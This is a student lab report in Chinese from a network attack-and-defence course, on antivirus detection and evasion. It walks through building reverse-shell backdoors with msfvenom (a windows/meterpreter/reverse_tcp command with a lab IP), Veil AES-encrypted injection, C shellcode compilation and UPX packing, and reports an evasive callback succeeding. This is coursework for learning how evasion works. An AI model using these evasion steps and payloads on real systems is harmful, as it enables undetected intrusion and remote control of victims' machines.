20212415 2023-2024-2 《网络与系统攻防技术》实验3实验报告

0.回答问题

（1）杀软是如何检测出恶意代码的？

通过以下途径来检测：
①病毒签名规则:病毒签名是根据已知病毒的特征码进行匹配检测，当计算机上的文件或进程的特征码与病毒签名数据库中的特征码匹配时，杀软会判断该文件或进程为病毒，并采取相应的处理措施。
②行为规则:杀软会监测计算机上的文件和进程的行为，当出现病毒常见的恶意行为时，如文件修改、注册表修改、网络连接等杀软会进行警报或处理。
③异常行为规则:杀软还会根据一些异常行为规则进行检测，如文件的隐藏属性、文件的扩展名异常等，当检测到异常行为时，杀软会进行警报或处理。
④后门、木马检测规则:杀软对常见的后门和木马程序有专门的检测规则，当检测到后门或木马的存在时，杀软会及时进行处理如删除或隔离。
⑤漏洞利用检测规则:杀软还会针对常见软件的漏洞进行检测，当检测到漏洞利用程序的存在时，杀软会进行警报或处理。

（2）免杀是做什么？

免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”，它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广，其中包含反汇编、逆向工程、系统漏洞等黑客技术。

（3）免杀的基本方法有哪些？

利用加壳技术、加花指令、修改程序入口点、修改内存特征码甚至加密盲免等，目的是修改病毒、木马的内容，从而躲避了杀毒软件的查杀。

1.实验内容

本周主要学习并实践了免杀原理与技术，需要完成以下内容：
(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧
正确使用msf编码器，使用msfvenom生成如jar之类的其他文件
veil，加壳工具
使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀

(3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功

2.实验过程

##（1）msf编码器测试

首先通过编辑器生成后门程序，并打开https://www.virustotal.com/gui/home/upload%E7%BD%91%E7%AB%99%E8%BF%9B%E8%A1%8C%E6%A3%80%E6%B5%8B%EF%BC%8C%E7%BB%93%E6%9E%9C%E5%A6%82%E4%B8%8B%E5%9B%BE%E6%89%80%E7%A4%BA%E3%80%82

接下来生成一次编码的程序，上传检测，结果如下图：

通过msf编辑器对后门程序进行处理生成.exe文件并不能有效的实现免杀， 所以接下来尝试生成其他类型的文件，来与.exe文件进行对比，首先是.jar文件：

接下来检测.php文件：

最后测试的是.py文件：

（2）veil方法测试

首先完成veil的安装，采用以下代码，并且默认勾选一直点下去。

1.apt -y install veil
2./usr/share/veil/config/setup.sh --force –silent

以下是安装过程截图：

安装完成后进入Evasion模块设置攻击载荷，对地址和端口进行配置，再使用generate指令生成.exe文件

输入生成的文件名，导出生成的文件：

将生成的程序进行检测：

（3）免杀方法c+shellcode

使用指令生成一段shellcode。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.131 LPORT=2415 -f c

使用touch 20212415.c新建一个.c空文件并将这一段ShellCode填入，加入主函数。

然后输入命令i686-w64-mingw32-g++ 20212415.c -o 20212415.exe
将生成的程序上传检测，得到如下结果：

（4）加壳方法

使用命令upx 20212415.exe -o 20212415shellcode.exe 将刚刚生成的shellcode进行加壳，然后进行检测。

（5）免杀方法组合使用

首先用电脑自带杀软检测以上步骤生成的程序：

尝试给这个文件加一层加密壳，使用如下指令。

veil
use Evasion
use python/shellcode_inject/aes_encrypt.py
generate
//选择2
//设置kali虚拟机IP和任意端口

按路径导出文件，上传网站检测

降低了，但电脑管家也能查出来：

（6）主机与虚拟机进行回连

生成.raw文件，粘贴至主机，开启监听回连

回连成功，使用杀软查杀也无法发现.raw文件

3.问题及解决方案

问题1：下载 veil时一开始一直显示要安装 use ，后来发现是下veil时没使用完整的代码，导致部分资源未下载成功。
问题1解决方案：使用代码：

1. apt -y install veil
2. /usr/share/veil/config/setup.sh --force –silent

4.学习感悟、思考等

本次实验学习了免杀原理并进行一些实践，采用的方式有生成不同类型的文件、加壳方法、多种技术的组合等。对于这些伪装高明的恶意代码，电脑的杀软甚至无法识别，这也为我要重视网络安全敲响了警钟。
就实验而言，目前单一的免杀难以躲过杀毒软件的检测，需要多种原理结合使用。

参考资料

• （1）https://baike.baidu.com/item/%E5%85%8D%E6%9D%80/164086
• （2）https://blog.csdn.net/weixin_52790143/article/details/124899260?ops_request_misc=&request_id=&biz_id=102&utm_term=%E6%9D%80%E8%BD%AF%E6%98%AF%E5%A6%82%E4%BD%95%E6%A3%80%E6%B5%8B%E5%87%BA%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E7%9A%84%EF%BC%9F&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-124899260.142^v100^pc_search_result_base2&spm=1018.2226.3001.4187